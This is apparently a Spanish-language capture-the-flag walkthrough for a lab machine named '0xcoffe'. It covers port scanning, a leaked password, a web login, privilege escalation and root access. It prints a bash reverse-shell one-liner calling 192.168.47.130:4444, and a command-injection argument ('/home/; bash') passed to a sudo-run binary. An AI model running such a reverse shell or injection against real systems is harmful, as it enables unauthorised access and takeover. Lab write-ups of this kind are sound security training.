0xcoffe

Iniciando con un escaneo de puertos me encontre con 2 puertos abiertos.

En el puerto 80, probe algunos comandos de injection sql pero no tuve exito alguno, revise el codigo fuente pero no se logra ver nada relevante

reviso el puerto 7777 que es tambien un servicio web y me consigo con que puedo ver el directorio ~ aqui consigo un directorio llamado secret, al acceder me consigo con un .txt (history.txt)

Tras leer el archivo .txt noto una palabra que me llamo la atencion "super_secure_password". Probe con ingresarla en la web que se aloja en el puerto 80, y logre obtener acceso al mismo.

Una vez dentro, pruebo con obtener una rev. shell

Configuration Identifier: script.sh Configuration Data: /bin/bash -i >& /dev/tcp/192.168.47.130/4444 0>&1 Intento de ejecutar sudo -l pero me solicita una contraseña. Por lo que revisando los directorios de los usuarios del sistema solo tengo permiso de accder en /home/codebad donde me encuentro con un directorio llamado secret que al acceder a el consigo un archivo llamado adivina.txt cat adivina.txt

La respuesta es: malware

La respuesta es: malware

Una vez dentro del usuario codebad, ejecuto sudo -l para ver si es posible escalar privilegios. Saliendo como resultado algo que en un principio no tenia muy en claro que podria hacer

Si intentamos leer el script, estará en un formato ilegible, pero podemos probar en ejecutarlo y ver que pasa:

Al hacer uso de ";" y poner whoami; ls, ejecuta ambos a la misma vez.

sudo -u metadata /home/codebad/code "/home/; bash"

Esto hará que se ejecute el binario bash y podremos escalar privilegios al usuario "metadata".

por lo que una vez con los privilegios intente ver si podia habia forma de escalar a root por medio de sudo pero pide una contraseña

Asique me puse a buscar si habia algún archivo con el nombre de "metadata" con el siguiente comando

find / -name "meta*" 2>/dev/null

Donde uno en especial me llamo la atencion

El ejecutarlo no da mucho resultado, asique probe considerando el nombre como una posible contraseña.

Teniendo como resultado la forma de escalar a root

PWNED!!

Última actualización